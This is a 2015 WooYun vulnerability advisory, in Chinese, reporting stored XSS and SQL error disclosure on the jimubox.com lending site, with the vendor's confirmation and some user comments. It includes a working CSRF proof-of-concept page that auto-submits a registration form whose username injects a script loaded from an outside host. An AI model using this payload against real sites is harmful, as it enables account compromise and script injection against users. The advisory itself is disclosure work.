当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116773

漏洞标题:积木盒子三处漏洞集合(可查询SQL语句)

相关厂商:jimubox.com

漏洞作者: q601333824

提交时间:2015-05-28 17:59

修复时间:2015-07-12 22:54

公开时间:2015-07-12 22:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

积木盒子三处小漏洞集合

详细说明:

1.这个漏洞用到的是第三方帐号,我用第三方帐号登录,到达这个页面

1.png


2.停在这个页面不要动,从上面图上,看出来,用户名注册,不能使用符号,但是这里只进行了本地验证用户名格式,服务器没有验证,post提交就行,可以注册一个XSS用户名

①。先用第三方帐号登录,停在那个页面不要动,访问下面这段下面

②.

<html>
<form id="csrf" name="csrf" action="https://www.jimubox.com/oauth/register" method="POST">
<input type="text" id="haha" name="UserName" value="XXXXXXXX" />
<input type="text" name="password" value="a456a456" />
</form>
<script>
var shuzu=['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','a','b','c','d','e','f','g'];
function test(){
var uid="";
for(var i=0;i<=15;i++)
{
var tbs=Math.floor(Math.random()*29);
uid=uid+shuzu[tbs];
}
return(uid);
}
var UserName=document.getElementById("haha");
UserName.value=test()+"<script/src='//fripside.sinaapp.com/jimuhezi.js'>"
setTimeout("document.csrf.submit();",2000);
</script>
</body>
</html>


3.如图. 名字的地方的被插入XSS.

2.png


3.png


------------------------------------------------------------------------------------------------
4.两种SQL报错
①.更新数据

5555555.png


②.插入数据

4565656565656.png


-------------------------------------------------------------------------------------------
5.论坛名字的地方,只进行本地验证,服务器没有验证,导致注册的名字可以插入XSS

88888888888888888888888888.png

漏洞证明:

1.漏洞证明看上面
2.①.更新数据

5555555.png


②.插入数据

4565656565656.png


3.

2.png


3.png


修复方案:

1.服务器验证下名字格式
2.配置不当,当参数过长,会导致SQL报错

3.只证明漏洞存在

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-28 18:10

厂商回复:

感谢您的关注,我们将马上进行修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-29 11:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个比你以为的要牛逼啊

  2. 2015-05-29 13:42 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @xsser 其实我小白,看人家有送礼物,想去混一下一 一+

  3. 2015-07-12 20:20 | Keen ( 路人 | Rank:2 漏洞数:1 | ...)

    这思路不错啊

  4. 2015-07-13 07:22 | #6c6c6c ( 普通白帽子 | Rank:291 漏洞数:47 | 像一条狗孤独的活着,渴望的活着,绝望的活...)

    二次开发毁一生

  5. 2015-07-14 20:53 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @xsser 这不是二次注入么,还有越权重置全网用户密码 csrf修改用户昵称倒没多大用处